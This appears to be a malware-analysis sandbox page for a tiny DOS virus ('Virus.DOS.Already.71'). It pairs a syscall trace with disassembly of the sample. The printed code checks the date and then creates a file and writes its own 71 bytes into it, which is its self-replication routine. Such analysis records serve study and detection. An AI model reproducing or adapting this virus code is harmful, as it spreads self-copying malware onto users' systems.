Sample viewer

vx.netlux.org/Virus.DOS.Already.71

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:20.285482467Z 42 PC: 12a44 | Get date 0x12a44: cmp dx, word ptr [0x137]
0x12a48: jne 0x12a55
0x12a4a: cmp cx, word ptr [0x139]
0x12a4e: jne 0x12a55
0x12a50: mov ax, 0x4c01
0x12a53: int 0x21
0x12a55: mov word ptr [0x137], dx
0x12a59: mov word ptr [0x139], cx
0x12a5d: mov dx, 0x13b
0x12a60: xor cx, cx
0x12a62: mov ah, 0x3c
0x12a64: int 0x21
0x12a66: mov bx, ax
0x12a68: mov dx, 0x100
0x12a6b: mov cx, 0x47
0x12a6e: mov ah, 0x40
0x12a70: int 0x21
0x12a72: mov ax, 0x4c00
0x12a75: int 0x21
0x12a77: add byte ptr [bx + si], al
2018-12-17T22:51:20.288502539Z 60 PC: 12a66 | Create or truncate file
2018-12-17T22:51:20.30435503Z 64 PC: 12a72 | Write file or device (Write 71 bytes on handle 5)
2018-12-17T22:51:20.308101555Z 76 PC: 12a77 | Terminate with return code (Return code = '0')